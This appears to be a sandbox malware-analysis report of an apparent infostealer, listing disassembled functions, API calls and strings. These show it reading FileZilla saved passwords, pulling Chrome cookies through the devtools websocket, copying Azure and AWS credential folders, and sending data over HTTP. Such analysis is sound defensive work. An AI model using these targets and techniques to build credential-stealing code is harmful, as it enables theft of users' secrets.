Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Part of subcall function 00418F70: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418F9B

Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92

Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15

Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22

Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6

Part of subcall function 0040A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040A13C
Part of subcall function 0040A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0040A161
Part of subcall function 0040A110: LocalAlloc.KERNEL32(00000040,?), ref: 0040A181
Part of subcall function 0040A110: ReadFile.KERNEL32(000000FF,?,00000000,00410447,00000000), ref: 0040A1AA
Part of subcall function 0040A110: LocalFree.KERNEL32(00410447), ref: 0040A1E0
Part of subcall function 0040A110: CloseHandle.KERNEL32(000000FF), ref: 0040A1EA

Part of subcall function 00418FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418FE2

strtok_s.MSVCRT ref: 0041047B
GetProcessHeap.KERNEL32(00000000,000F423F,00420DBF,00420DBE,00420DBB,00420DBA), ref: 004104C2
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB7), ref: 004104C9
StrStrA.SHLWAPI(00000000,<Host>), ref: 004104E5
lstrlenA.KERNEL32(00000000), ref: 004104F3

Part of subcall function 00418A70: malloc.MSVCRT ref: 00418A78
Part of subcall function 00418A70: strncpy.MSVCRT ref: 00418A93

StrStrA.SHLWAPI(00000000,<Port>), ref: 0041052F
lstrlenA.KERNEL32(00000000), ref: 0041053D
StrStrA.SHLWAPI(00000000,<User>), ref: 00410579
lstrlenA.KERNEL32(00000000), ref: 00410587
StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 004105C3
lstrlenA.KERNEL32(00000000), ref: 004105D5
lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB7), ref: 00410662
lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 0041067A
lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 00410692
lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 004106AA
lstrcatA.KERNEL32(?,browser: FileZilla,?,?,00000000), ref: 004106C2
lstrcatA.KERNEL32(?,profile: null,?,?,00000000), ref: 004106D1
lstrcatA.KERNEL32(?,url: ,?,?,00000000), ref: 004106E0
lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 004106F3
lstrcatA.KERNEL32(?,00421770,?,?,00000000), ref: 00410702
lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00410715
lstrcatA.KERNEL32(?,00421774,?,?,00000000), ref: 00410724
lstrcatA.KERNEL32(?,login: ,?,?,00000000), ref: 00410733
lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00410746
lstrcatA.KERNEL32(?,00421780,?,?,00000000), ref: 00410755
lstrcatA.KERNEL32(?,password: ,?,?,00000000), ref: 00410764
lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00410777
lstrcatA.KERNEL32(?,00421790,?,?,00000000), ref: 00410786
lstrcatA.KERNEL32(?,00421794,?,?,00000000), ref: 00410795
strtok_s.MSVCRT ref: 004107D9
lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB7), ref: 004107EE
memset.MSVCRT ref: 0041083D

Strings

\AppData\Roaming\FileZilla\recentservers.xml, xrefs: 00410404
password: , xrefs: 0041075B
<Host>, xrefs: 004104DC
<Pass encoding="base64">, xrefs: 004105BA
profile: null, xrefs: 004106C8
login: , xrefs: 0041072A
url: , xrefs: 004106D7
browser: FileZilla, xrefs: 004106B9
<Port>, xrefs: 00410526
<User>, xrefs: 00410570

Memory Dump Source

Source File: 00000000.00000002.1907555861.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DbMBWMxoNv.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrlen$lstrcpy$AllocFileLocal$Heapstrtok_s$CloseCreateFolderFreeHandlePathProcessReadSizemallocmemsetstrncpy
String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
API String ID: 337689325-555421843
Opcode ID: 947e5d9201ff11c517d3e5c67801d5ffe8781d992a0e166ef9a9951640d5e26f
Instruction ID: 8daa67574ba642934e37c5269d194fb48a2cec37eebf9d0dac7d381e96a5dd97
Opcode Fuzzy Hash: 947e5d9201ff11c517d3e5c67801d5ffe8781d992a0e166ef9a9951640d5e26f
Instruction Fuzzy Hash: 65D17271E01108ABCB04EBF0ED56EEE7339AF54315F50855AF102B7095EF38AA94CB69

Function 00419BB0 Relevance: 61.5, APIs: 33, Strings: 2, Instructions: 212
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(77190000,02CA1298), ref: 00419BF1
GetProcAddress.KERNEL32(77190000,02CA11F0), ref: 00419C0A
GetProcAddress.KERNEL32(77190000,02CA12B0), ref: 00419C22
GetProcAddress.KERNEL32(77190000,02CA1370), ref: 00419C3A
GetProcAddress.KERNEL32(77190000,02CA1358), ref: 00419C53
GetProcAddress.KERNEL32(77190000,02D1DF28), ref: 00419C6B
GetProcAddress.KERNEL32(77190000,02D1B230), ref: 00419C83
GetProcAddress.KERNEL32(77190000,02D1B0F0), ref: 00419C9C
GetProcAddress.KERNEL32(77190000,02CA13B8), ref: 00419CB4
GetProcAddress.KERNEL32(77190000,02CA1388), ref: 00419CCC
GetProcAddress.KERNEL32(77190000,02CA13A0), ref: 00419CE5
GetProcAddress.KERNEL32(77190000,02CA13D0), ref: 00419CFD
GetProcAddress.KERNEL32(77190000,02D1B070), ref: 00419D15
GetProcAddress.KERNEL32(77190000,02CA13E8), ref: 00419D2E
GetProcAddress.KERNEL32(77190000,02CA1400), ref: 00419D46
GetProcAddress.KERNEL32(77190000,02D1B0B0), ref: 00419D5E
GetProcAddress.KERNEL32(77190000,02CA1418), ref: 00419D77
GetProcAddress.KERNEL32(77190000,02D1E9F0), ref: 00419D8F
GetProcAddress.KERNEL32(77190000,02D1B2F0), ref: 00419DA7
GetProcAddress.KERNEL32(77190000,02D1E9D8), ref: 00419DC0
GetProcAddress.KERNEL32(77190000,02D1B030), ref: 00419DD8
LoadLibraryA.KERNEL32(02D1E990,?,00416CA0), ref: 00419DEA
LoadLibraryA.KERNEL32(02D1E960,?,00416CA0), ref: 00419DFB
LoadLibraryA.KERNEL32(02D1EA08,?,00416CA0), ref: 00419E0D
LoadLibraryA.KERNEL32(02D1E948,?,00416CA0), ref: 00419E1F
LoadLibraryA.KERNEL32(02D1E9A8,?,00416CA0), ref: 00419E30
GetProcAddress.KERNEL32(76850000,02D1E978), ref: 00419E52
GetProcAddress.KERNEL32(77040000,02D1E9C0), ref: 00419E73
GetProcAddress.KERNEL32(77040000,02D1E648), ref: 00419E8B
GetProcAddress.KERNEL32(75A10000,02D1E828), ref: 00419EAD
GetProcAddress.KERNEL32(75690000,02D1B010), ref: 00419ECE
GetProcAddress.KERNEL32(776F0000,02D1DF98), ref: 00419EEF
GetProcAddress.KERNEL32(776F0000,NtQueryInformationProcess), ref: 00419F06

Strings

F(t, xrefs: 00419E91
NtQueryInformationProcess, xrefs: 00419EFA

Memory Dump Source

Source File: 00000000.00000002.1907555861.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DbMBWMxoNv.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: F(t$NtQueryInformationProcess
API String ID: 2238633743-4113152680
Opcode ID: edf66d35e3c25c46ff42be0291b8a279c2bd212ca972e11257e66bc224b5ba57
Instruction ID: 85c76ffc39373860cb8090e471c59d53cf6ad49422061259caa86ebb7f60cad9
Opcode Fuzzy Hash: edf66d35e3c25c46ff42be0291b8a279c2bd212ca972e11257e66bc224b5ba57
Instruction Fuzzy Hash: 4DA16FB5D0A2549FC344DFA8FC889567BBBA74D301708A61BF909C3674E734AA40CF62

Function 00405150 Relevance: 53.1, APIs: 22, Strings: 8, Instructions: 569
stringnetworkmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6

Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 0040483A
Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404851
Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404868
Part of subcall function 00404800: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404889
Part of subcall function 00404800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404899

lstrlenA.KERNEL32(00000000), ref: 004051E3

Part of subcall function 00419030: CryptBinaryToStringA.CRYPT32(00000000,004051D4,40000001,00000000,00000000,?,004051D4), ref: 00419050

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00405257
StrCmpCA.SHLWAPI(?,02D27178), ref: 00405275
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405390
HttpOpenRequestA.WININET(00000000,02D27128,?,02D26910,00000000,00000000,00400100,00000000), ref: 004053F4

Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22

Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15

Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92

lstrlenA.KERNEL32(00000000,00000000,?,",00000000,?,02D270C8,00000000,?,02D21DF0,00000000,?,00421B0C,00000000,?,0041541F), ref: 00405787
lstrlenA.KERNEL32(00000000), ref: 0040579B
GetProcessHeap.KERNEL32(00000000,?), ref: 004057AC
HeapAlloc.KERNEL32(00000000), ref: 004057B3
lstrlenA.KERNEL32(00000000), ref: 004057C8
memcpy.MSVCRT(?,00000000,00000000), ref: 004057DF
lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 004057F9
memcpy.MSVCRT(?), ref: 00405806
lstrlenA.KERNEL32(00000000), ref: 00405818
lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00405831
memcpy.MSVCRT(?), ref: 00405841
lstrlenA.KERNEL32(00000000,?,?), ref: 0040585E
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00405872
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0040589D
InternetCloseHandle.WININET(00000000), ref: 00405901
InternetCloseHandle.WININET(00000000), ref: 0040590E
InternetCloseHandle.WININET(00000000), ref: 00405918

Strings

", xrefs: 00405756
------, xrefs: 00405549
--, xrefs: 004052D0
------, xrefs: 004052E7
------, xrefs: 00405407
", xrefs: 004054D2
------, xrefs: 0040568B
", xrefs: 00405614

Memory Dump Source

Source File: 00000000.00000002.1907555861.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DbMBWMxoNv.jbxd

Yara matches

Similarity

API ID: lstrlen$Internet$lstrcpy$??2@CloseHandlememcpy$HeapHttpOpenRequestlstrcat$AllocBinaryConnectCrackCryptFileProcessReadSendString
String ID: ------$"$"$"$--$------$------$------
API String ID: 2744873387-2774362122
Opcode ID: ebc80115655402ddfebef129c0a83e091647043846189dfc7deacbe41e213525
Instruction ID: 17d44de56e64bdd087ca749706e31b97a9426ac18b0a434e790be536538602ee
Opcode Fuzzy Hash: ebc80115655402ddfebef129c0a83e091647043846189dfc7deacbe41e213525
Instruction Fuzzy Hash: 34321071A22118ABCB14EBA1DC65FEE7379BF54714F00419EF10662092EF387A98CF59

Function 004059B0 Relevance: 46.0, APIs: 19, Strings: 7, Instructions: 493
networkstringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6

Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 0040483A
Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404851
Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404868
Part of subcall function 00404800: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404889
Part of subcall function 00404800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404899

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00405A48
StrCmpCA.SHLWAPI(?,02D27178), ref: 00405A63
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405BE3
lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,02D27048,00000000,?,02D21DF0,00000000,?,00421B4C), ref: 00405EC1
lstrlenA.KERNEL32(00000000), ref: 00405ED2
GetProcessHeap.KERNEL32(00000000,?), ref: 00405EE3
HeapAlloc.KERNEL32(00000000), ref: 00405EEA
lstrlenA.KERNEL32(00000000), ref: 00405EFF
memcpy.MSVCRT(?,00000000,00000000), ref: 00405F16
lstrlenA.KERNEL32(00000000), ref: 00405F28
lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00405F41
memcpy.MSVCRT(?), ref: 00405F4E
lstrlenA.KERNEL32(00000000,?,?), ref: 00405F6B
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00405F7F
InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00405F9C
InternetCloseHandle.WININET(00000000), ref: 00406000
InternetCloseHandle.WININET(00000000), ref: 0040600D
HttpOpenRequestA.WININET(00000000,02D27128,?,02D26910,00000000,00000000,00400100,00000000), ref: 00405C48

Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22

Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15

Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92

InternetCloseHandle.WININET(00000000), ref: 00406017

Strings

", xrefs: 00405E66
", xrefs: 00405D25
S`A, xrefs: 004060CA
------, xrefs: 00405D9C
S`A, xrefs: 00405A0F, 004060B7, 00405A97, 00405AA0, 00405B0E, 00405B85, 00405C83, 00405DC4, 00405B11, 00405B88, 00405C86, 00405DC7
------, xrefs: 00405C5B
------, xrefs: 00405AE6

Memory Dump Source

Source File: 00000000.00000002.1907555861.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DbMBWMxoNv.jbxd

Yara matches

Similarity

API ID: lstrlen$Internet$lstrcpy$??2@CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocConnectCrackFileProcessReadSend
String ID: "$"$------$------$------$S`A$S`A
API String ID: 1406981993-1449208648
Opcode ID: 0949584e633ec0e9df87f98d28b6d775f31e9553aa551853ff61b782f3138f13
Instruction ID: 528bda5bfb4e43d7cafc1c43cb8ffcda3f2e6465d8e228b0a039cdd5195e34d5
Opcode Fuzzy Hash: 0949584e633ec0e9df87f98d28b6d775f31e9553aa551853ff61b782f3138f13
Instruction Fuzzy Hash: 1412FC71925128ABCB14EBA1DCA5FEEB379BF14714F00419EF10662091EF783B98CB59

Function 00409BE0 Relevance: 35.1, APIs: 15, Strings: 5, Instructions: 141
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00409A50: InternetOpenA.WININET(00420AF6,00000001,00000000,00000000,00000000), ref: 00409A6A

memset.MSVCRT ref: 00409C33
lstrcatA.KERNEL32(?,ws://localhost:9229), ref: 00409C48
lstrcatA.KERNEL32(?,00000000), ref: 00409C5E
connect_to_websocket.CHROME(?,00000000), ref: 00409C76
memset.MSVCRT ref: 00409C9A
lstrcatA.KERNEL32(?,cookies), ref: 00409CAF
lstrcatA.KERNEL32(?,004212C4), ref: 00409CC1
lstrcatA.KERNEL32(?,?), ref: 00409CD5
lstrcatA.KERNEL32(?,004212C8), ref: 00409CE7
lstrcatA.KERNEL32(?,?), ref: 00409CFB
lstrcatA.KERNEL32(?,.txt), ref: 00409D0D
lstrlenA.KERNEL32(00000000), ref: 00409D17
lstrlenA.KERNEL32(00000000), ref: 00409D26

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

memset.MSVCRT ref: 00409D7E
free_result.CHROME(00000000), ref: 00409D8B

Strings

ws://localhost:9229, xrefs: 00409C3C
cookies, xrefs: 00409CA3
/devtools, xrefs: 00409C0B
localhost, xrefs: 00409BF5
.txt, xrefs: 00409D01

Memory Dump Source

Source File: 00000000.00000002.1907555861.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DbMBWMxoNv.jbxd

Yara matches

Similarity

API ID: lstrcat$memset$lstrlen$InternetOpenconnect_to_websocketfree_resultlstrcpy
String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
API String ID: 2548846003-3542011879
Opcode ID: d4845702bb70edcc7fea4dc6ddcab5e85077a65133c569042cb5c6e8179a317d
Instruction ID: 1e3ba8098c842174df250e80db853f4d4b60fbd66b6473dd4ea4394eaad1eb8a
Opcode Fuzzy Hash: d4845702bb70edcc7fea4dc6ddcab5e85077a65133c569042cb5c6e8179a317d
Instruction Fuzzy Hash: 8D516D71D10518ABCB14EBA0EC55FEE7738AF14306F40456AF106A70D1EB78AA88CF69

Function 00414FC0 Relevance: 33.4, APIs: 10, Strings: 9, Instructions: 119
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00414FD7

Part of subcall function 00418F70: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418F9B

lstrcatA.KERNEL32(?,00000000), ref: 00415000
lstrcatA.KERNEL32(?,\.azure\), ref: 0041501D

Part of subcall function 00414B60: wsprintfA.USER32 ref: 00414B7C
Part of subcall function 00414B60: FindFirstFileA.KERNEL32(?,?), ref: 00414B93

memset.MSVCRT ref: 00415063
lstrcatA.KERNEL32(?,00000000), ref: 0041508C
lstrcatA.KERNEL32(?,\.aws\), ref: 004150A9

Part of subcall function 00414B60: StrCmpCA.SHLWAPI(?,00420FC4), ref: 00414BC1
Part of subcall function 00414B60: StrCmpCA.SHLWAPI(?,00420FC8), ref: 00414BD7
Part of subcall function 00414B60: FindNextFileA.KERNEL32(000000FF,?), ref: 00414DCD
Part of subcall function 00414B60: FindClose.KERNEL32(000000FF), ref: 00414DE2

memset.MSVCRT ref: 004150EF
lstrcatA.KERNEL32(?,00000000), ref: 00415118
lstrcatA.KERNEL32(?,\.IdentityService\), ref: 00415135

Part of subcall function 00414B60: wsprintfA.USER32 ref: 00414C00
Part of subcall function 00414B60: StrCmpCA.SHLWAPI(?,004208D3), ref: 00414C15
Part of subcall function 00414B60: wsprintfA.USER32 ref: 00414C32
Part of subcall function 00414B60: PathMatchSpecA.SHLWAPI(?,?), ref: 00414C6E
Part of subcall function 00414B60: lstrcatA.KERNEL32(?,02D27088,?,000003E8), ref: 00414C9A
Part of subcall function 00414B60: lstrcatA.KERNEL32(?,00420FE0), ref: 00414CAC
Part of subcall function 00414B60: lstrcatA.KERNEL32(?,?), ref: 00414CC0
Part of subcall function 00414B60: lstrcatA.KERNEL32(?,00420FE4), ref: 00414CD2
Part of subcall function 00414B60: lstrcatA.KERNEL32(?,?), ref: 00414CE6
Part of subcall function 00414B60: CopyFileA.KERNEL32(?,?,00000001), ref: 00414CFC
Part of subcall function 00414B60: DeleteFileA.KERNEL32(?), ref: 00414D81

memset.MSVCRT ref: 0041517B

Strings

\.IdentityService\, xrefs: 00415129
Azure\.aws, xrefs: 004150AF
msal.cache, xrefs: 00415140
\.aws\, xrefs: 0041509D
*.*, xrefs: 004150B4
Azure\.IdentityService, xrefs: 0041513B
\.azure\, xrefs: 00415011
*.*, xrefs: 00415028
Azure\.azure, xrefs: 00415023

Memory Dump Source

Source File: 00000000.00000002.1907555861.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DbMBWMxoNv.jbxd

Yara matches

Similarity

API ID: lstrcat$Filememset$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
API String ID: 4017274736-974132213
Opcode ID: 6555880c2db314fee9a1349dfad1e8b730bf1dfe101e4ee7345c8f9142a1bd6a
Instruction ID: 39229561bcf9e6d20be1630849a4938ad9d2aa6361ec20f439e2b4dca26d7b75
Opcode Fuzzy Hash: 6555880c2db314fee9a1349dfad1e8b730bf1dfe101e4ee7345c8f9142a1bd6a
